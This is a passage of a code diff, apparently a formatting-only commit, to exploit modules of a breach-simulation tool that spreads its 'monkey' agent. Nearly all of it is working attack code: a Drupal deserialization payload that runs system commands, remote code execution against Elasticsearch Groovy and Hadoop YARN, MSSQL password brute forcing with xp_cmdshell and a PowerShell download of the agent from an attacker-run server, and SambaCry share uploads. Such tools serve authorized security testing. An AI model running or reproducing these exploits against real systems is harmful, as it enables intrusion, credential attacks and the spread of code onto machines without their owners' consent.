f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
f"but only {num_available_urls} found"
)
return result
def is_response_cached(r: requests.Response) -> bool:
""" Check if a response had the cache header. """
return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT"
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
@ -141,12 +150,12 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
articles = set()
while lower < upper:
node_url = urljoin(base_url, str(lower))
response = requests.get(node_url,
verify=False,
timeout=LONG_REQUEST_TIMEOUT) # noqa: DUO123
response = requests.get(
node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
) # noqa: DUO123
if response.status_code == 200:
if is_response_cached(response):
LOG.info(f'Found a cached article at: {node_url}, skipping')
LOG.info(f"Found a cached article at: {node_url}, skipping")
else:
articles.add(lower)
lower += 1
@ -155,20 +164,10 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
"_links": {
"type": {
"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"
}
},
"type": {
"target_id": "article"
},
"title": {
"value": "My Article"
},
"body": {
"value": ""
}
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
}
return payload
@ -178,21 +177,17 @@ def build_cmd_execution_payload(base, cmd):
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000"
"GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\""
"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:"
"{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
"s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000"
"stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000"
"GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\""
"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
"".replace('|size|', str(len(cmd))).replace('|command|', cmd)
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
"_links": {
"type": {
"href": f"{urljoin(base, '/rest/type/shortcut/default')}"
}
}
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload

View File

@ -13,12 +13,18 @@ import requests
from common.common_consts.network_consts import ES_SERVICE
from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CMD_PREFIX, DOWNLOAD_TIMEOUT, ID_STRING,
WGET_HTTP_UPLOAD)
from infection_monkey.model import (
BITSADMIN_CMDLINE_HTTP,
CHECK_COMMAND,
CMD_PREFIX,
DOWNLOAD_TIMEOUT,
ID_STRING,
WGET_HTTP_UPLOAD,
)
from infection_monkey.network.elasticfinger import ES_PORT
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
__author__ = 'danielg, VakarisZ'
__author__ = "danielg, VakarisZ"
LOG = logging.getLogger(__name__)
@ -26,21 +32,28 @@ LOG = logging.getLogger(__name__)
class ElasticGroovyExploiter(WebRCE):
# attack URLs
MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
JAVA_CMD = \
GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
GENERIC_QUERY = (
"""{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
)
JAVA_CMD = (
GENERIC_QUERY
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Elastic search'
_TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Elastic search"
def __init__(self, host):
super(ElasticGroovyExploiter, self).__init__(host)
def get_exploit_config(self):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty']
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
"linux": WGET_HTTP_UPLOAD,
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config
def get_open_service_ports(self, port_list, names):
@ -56,7 +69,9 @@ class ElasticGroovyExploiter(WebRCE):
try:
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
LOG.error(
"Elastic couldn't upload monkey, because server didn't respond to upload request."
)
return False
result = self.get_results(response)
if not result:
@ -65,7 +80,7 @@ class ElasticGroovyExploiter(WebRCE):
def upload_monkey(self, url, commands=None):
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
if 'windows' in self.host.os['type'] and result:
if "windows" in self.host.os["type"] and result:
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
return result
@ -76,14 +91,14 @@ class ElasticGroovyExploiter(WebRCE):
"""
try:
json_resp = json.loads(response.text)
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
except (KeyError, IndexError):
return None
def check_if_exploitable(self, url):
# Overridden web_rce method that adds CMD prefix for windows command
try:
if 'windows' in self.host.os['type']:
if "windows" in self.host.os["type"]:
resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
else:
resp = self.exploit(url, CHECK_COMMAND)

View File

@ -15,16 +15,21 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import HADOOP_LINUX_COMMAND, HADOOP_WINDOWS_COMMAND, ID_STRING, MONKEY_ARG
from infection_monkey.model import (
HADOOP_LINUX_COMMAND,
HADOOP_WINDOWS_COMMAND,
ID_STRING,
MONKEY_ARG,
)
__author__ = 'VakarisZ'
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Hadoop'
_TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Hadoop"
HADOOP_PORTS = [["8088", False]]
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
@ -41,13 +46,13 @@ class HadoopExploiter(WebRCE):
if not self.vulnerable_urls:
return False
# We presume hadoop works only on 64-bit machines
if self.host.os['type'] == 'windows':
self.host.os['machine'] = '64'
if self.host.os["type"] == "windows":
self.host.os["machine"] = "64"
paths = self.get_monkey_paths()
if not paths:
return False
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
command = self.build_command(paths['dest_path'], http_path)
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
command = self.build_command(paths["dest_path"], http_path)
if not self.exploit(self.vulnerable_urls[0], command):
return False
http_thread.join(self.DOWNLOAD_TIMEOUT)
@ -57,35 +62,47 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp['application-id']
app_id = resp["application-id"]
# Create a random name for our application in YARN
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
rand_name = ID_STRING + "".join(
[random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
def check_if_exploitable(self, url):
try:
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT,
)
except requests.ConnectionError:
return False
return resp.status_code == 200
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0])
if 'linux' in self.host.os['type']:
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
else:
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path,
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
return base_command % {
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
@ -97,6 +114,6 @@ class HadoopExploiter(WebRCE):
"command": command,
}
},
"application-type": "YARN"
"application-type": "YARN",
}
return payload

View File

@ -8,7 +8,11 @@ import pymssql
from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_monkey_dest_path
from infection_monkey.exploit.tools.helpers import (
build_monkey_commandline,
get_monkey_depth,
get_monkey_dest_path,
)
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
from infection_monkey.model import DROPPER_ARG
@ -17,33 +21,37 @@ LOG = logging.getLogger(__name__)
class MSSQLExploiter(HostExploiter):
_EXPLOITED_SERVICE = 'MSSQL'
_TARGET_OS_TYPE = ['windows']
_EXPLOITED_SERVICE = "MSSQL"
_TARGET_OS_TYPE = ["windows"]
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
LOGIN_TIMEOUT = 15
# Time in seconds to wait between MSSQL queries.
QUERY_BUFFER = 0.5
SQL_DEFAULT_TCP_PORT = '1433'
SQL_DEFAULT_TCP_PORT = "1433"
# Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = 'tmp_monkey.bat'
TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
XP_CMDSHELL_COMMAND_END = "\""
XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
XP_CMDSHELL_COMMAND_END = '"'
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
"DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)."
"DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
)
def __init__(self, host):
super(MSSQLExploiter, self).__init__(host)
self.cursor = None
self.monkey_server = None
self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
self.payload_file_path = os.path.join(
MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
)
def _exploit_host(self):
"""
@ -52,7 +60,9 @@ class MSSQLExploiter(HostExploiter):
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
self.cursor = self.brute_force(
self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
)
# Create dir for payload
self.create_temp_dir()
@ -80,11 +90,15 @@ class MSSQLExploiter(HostExploiter):
return self.run_mssql_command(file_running_command)
def create_temp_dir(self):
dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
dir_creation_command = MSSQLLimitedSizePayload(
command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
)
self.run_mssql_command(dir_creation_command)
def create_empty_payload_file(self):
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
payload_file_path=self.payload_file_path
)
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
self.run_mssql_command(tmp_file_creation_command)
@ -111,9 +125,13 @@ class MSSQLExploiter(HostExploiter):
def remove_temp_dir(self):
# Remove temporary dir we stored payload at
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
tmp_file_removal_command = MSSQLLimitedSizePayload(
command="del {}".format(self.payload_file_path)
)
self.run_mssql_command(tmp_file_removal_command)
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
tmp_dir_removal_command = MSSQLLimitedSizePayload(
command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
)
self.run_mssql_command(tmp_dir_removal_command)
def start_monkey_server(self):
@ -131,25 +149,29 @@ class MSSQLExploiter(HostExploiter):
def get_monkey_launch_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
# Form monkey's launch command
monkey_args = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
MSSQLExploiter.SQL_DEFAULT_TCP_PORT,
dst_path)
monkey_args = build_monkey_commandline(
self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path
)
suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
return MSSQLLimitedSizePayload(
command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
prefix=prefix,
suffix=suffix)
suffix=suffix,
)
def get_monkey_download_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
http_path=self.monkey_server.http_path, dst_path=dst_path
)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
return MSSQLLimitedSizePayload(command=monkey_download_command,
suffix=suffix,
prefix=prefix)
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
payload_file_path=self.payload_file_path
)
return MSSQLLimitedSizePayload(
command=monkey_download_command, suffix=suffix, prefix=prefix
)
def brute_force(self, host, port, users_passwords_pairs_list):
"""
@ -170,10 +192,14 @@ class MSSQLExploiter(HostExploiter):
try:
# Core steps
# Trying to connect
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
conn = pymssql.connect(
host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
)
LOG.info(
'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format(
host, user, self._config.hash_sensitive_data(password)))
"Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
host, user, self._config.hash_sensitive_data(password)
)
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)
cursor = conn.cursor()
@ -183,14 +209,20 @@ class MSSQLExploiter(HostExploiter):
# Combo didn't work, hopping to the next one
pass
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
'aborting brute force'.format(host, port))
raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
LOG.warning(
"No user/password combo was able to connect to host: {0}:{1}, "
"aborting brute force".format(host, port)
)
raise FailedExploitationError(
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
)
class MSSQLLimitedSizePayload(LimitedSizePayload):
def __init__(self, command, prefix="", suffix=""):
super(MSSQLLimitedSizePayload, self).__init__(command=command,
super(MSSQLLimitedSizePayload, self).__init__(
command=command,
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END,
)

View File

@ -8,24 +8,46 @@ from io import BytesIO
import impacket.smbconnection
from impacket.nmb import NetBIOSError
from impacket.nt_errors import STATUS_SUCCESS
from impacket.smb import (FILE_DIRECTORY_FILE, FILE_NON_DIRECTORY_FILE, FILE_OPEN, FILE_READ_DATA, FILE_SHARE_READ,
FILE_WRITE_DATA, SMB, SMB_DIALECT, SessionError, SMBCommand, SMBNtCreateAndX_Data,
SMBNtCreateAndX_Parameters)
from impacket.smb3structs import (SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE,
SMB2Create, SMB2Create_Response, SMB2Packet)
from impacket.smb import (
FILE_DIRECTORY_FILE,
FILE_NON_DIRECTORY_FILE,
FILE_OPEN,
FILE_READ_DATA,
FILE_SHARE_READ,
FILE_WRITE_DATA,
SMB,
SMB_DIALECT,
SessionError,
SMBCommand,
SMBNtCreateAndX_Data,
SMBNtCreateAndX_Parameters,
)
from impacket.smb3structs import (
SMB2_CREATE,
SMB2_FLAGS_DFS_OPERATIONS,
SMB2_IL_IMPERSONATION,
SMB2_OPLOCK_LEVEL_NONE,
SMB2Create,
SMB2Create_Response,
SMB2Packet,
)
from impacket.smbconnection import SMBConnection
import infection_monkey.monkeyfs as monkeyfs
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey_by_os
from infection_monkey.exploit.tools.helpers import (
build_monkey_commandline,
get_monkey_depth,
get_target_monkey_by_os,
)
from infection_monkey.model import DROPPER_ARG
from infection_monkey.network.smbfinger import SMB_SERVICE
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.pyinstaller_utils import get_binary_file_path
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
LOG = logging.getLogger(__name__)
@ -36,7 +58,7 @@ class SambaCryExploiter(HostExploiter):
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
"""
_TARGET_OS_TYPE = ['linux']
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Samba"
# Name of file which contains the monkey's commandline
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
@ -65,8 +87,10 @@ class SambaCryExploiter(HostExploiter):
return False
writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr)
LOG.info("Writable shares and their credentials on host %s: %s" %
(self.host.ip_addr, str(writable_shares_creds_dict)))
LOG.info(
"Writable shares and their credentials on host %s: %s"
% (self.host.ip_addr, str(writable_shares_creds_dict))
)
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
@ -79,16 +103,25 @@ class SambaCryExploiter(HostExploiter):
successfully_triggered_shares = []
for share in writable_shares_creds_dict:
trigger_result = self.get_trigger_result(self.host.ip_addr, share, writable_shares_creds_dict[share])
trigger_result = self.get_trigger_result(
self.host.ip_addr, share, writable_shares_creds_dict[share]
)
creds = writable_shares_creds_dict[share]
self.report_login_attempt(
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
trigger_result is not None,
creds["username"],
creds["password"],
creds["lm_hash"],
creds["ntlm_hash"],
)
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
'host': self.host.ip_addr,
'port': self.SAMBA_PORT,
'share_name': share}
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
"username": creds["username"],
"host": self.host.ip_addr,
"port": self.SAMBA_PORT,
"share_name": share,
}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@ -97,8 +130,9 @@ class SambaCryExploiter(HostExploiter):
if len(successfully_triggered_shares) > 0:
LOG.info(
"Shares triggered successfully on host %s: %s" % (
self.host.ip_addr, str(successfully_triggered_shares)))
"Shares triggered successfully on host %s: %s"
% (self.host.ip_addr, str(successfully_triggered_shares))
)
self.add_vuln_port(self.SAMBA_PORT)
return True
else:
@ -117,8 +151,9 @@ class SambaCryExploiter(HostExploiter):
self.trigger_module(smb_client, share)
except (impacket.smbconnection.SessionError, SessionError):
LOG.debug(
"Exception trying to exploit host: %s, share: %s, with creds: %s." % (
self.host.ip_addr, share, str(creds)))
"Exception trying to exploit host: %s, share: %s, with creds: %s."
% (self.host.ip_addr, share, str(creds))
)
def clean_share(self, ip, share, creds):
"""
@ -129,9 +164,14 @@ class SambaCryExploiter(HostExploiter):
"""
smb_client = self.connect_to_server(ip, creds)
tree_id = smb_client.connectTree(share)
file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
file_list = [
self.SAMBACRY_COMMANDLINE_FILENAME,
self.SAMBACRY_RUNNER_RESULT_FILENAME,
self.SAMBACRY_RUNNER_FILENAME_32,
self.SAMBACRY_RUNNER_FILENAME_64,
self.SAMBACRY_MONKEY_FILENAME_32,
self.SAMBACRY_MONKEY_FILENAME_64,
]
for filename in file_list:
try:
@ -153,8 +193,9 @@ class SambaCryExploiter(HostExploiter):
tree_id = smb_client.connectTree(share)
file_content = None
try:
file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA)
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
except (impacket.smbconnection.SessionError, SessionError):
@ -193,16 +234,18 @@ class SambaCryExploiter(HostExploiter):
def get_credentials_list(self):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = [{'username': user, 'password': password, 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds]
creds = [
{"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds
]
# Add empty credentials for anonymous shares.
creds.insert(0, {'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''})
creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
return creds
def list_shares(self, smb_client):
shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()]
shares = [x["shi1_netname"][:-1] for x in smb_client.listShares()]
return [x for x in shares if x not in self._config.sambacry_shares_not_to_check]
def is_vulnerable(self):
@ -214,8 +257,8 @@ class SambaCryExploiter(HostExploiter):
LOG.info("Host: %s doesn't have SMB open" % self.host.ip_addr)
return False
pattern = re.compile(r'\d*\.\d*\.\d*')
smb_server_name = self.host.services[SMB_SERVICE].get('name')
pattern = re.compile(r"\d*\.\d*\.\d*")
smb_server_name = self.host.services[SMB_SERVICE].get("name")
if not smb_server_name:
LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
return False
@ -224,26 +267,37 @@ class SambaCryExploiter(HostExploiter):
is_vulnerable = False
if pattern_result is not None:
samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
samba_version_parts = samba_version.split('.')
samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
samba_version_parts[1] <= "13"):
elif (
(samba_version_parts[0] == "4")
and (samba_version_parts[1] == "4")
and (samba_version_parts[1] <= "13")
):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
samba_version_parts[1] <= "9"):
elif (
(samba_version_parts[0] == "4")
and (samba_version_parts[1] == "5")
and (samba_version_parts[1] <= "9")
):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
samba_version_parts[1] <= "3"):
elif (
(samba_version_parts[0] == "4")
and (samba_version_parts[1] == "6")
and (samba_version_parts[1] <= "3")
):
is_vulnerable = True
else:
# If pattern doesn't match we can't tell what version it is. Better try
is_vulnerable = True
LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" %
(self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable)))
LOG.info(
"Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s"
% (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))
)
return is_vulnerable
@ -255,27 +309,41 @@ class SambaCryExploiter(HostExploiter):
"""
tree_id = smb_client.connectTree(share)
with self.get_monkey_commandline_file(self._config.dropper_target_path_linux) as monkey_commandline_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
with self.get_monkey_commandline_file(
self._config.dropper_target_path_linux
) as monkey_commandline_file:
smb_client.putFile(
share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read
)
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
smb_client.putFile(
share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read
)
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
smb_client.putFile(
share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read
)
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
smb_client.putFile(
share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read
)
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
T1105Telem(ScanStatus.USED,
smb_client.putFile(
share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read
)
T1105Telem(
ScanStatus.USED,
get_interface_to_target(self.host.ip_addr),
self.host.ip_addr,
monkey_bin_64_src_path).send()
monkey_bin_64_src_path,
).send()
smb_client.disconnectTree(tree_id)
def trigger_module(self, smb_client, share):
@ -305,7 +373,7 @@ class SambaCryExploiter(HostExploiter):
self.open_pipe(smb_client, "/" + module_path)
except Exception as e:
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
return True
else:
pass
@ -320,7 +388,10 @@ class SambaCryExploiter(HostExploiter):
"""
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
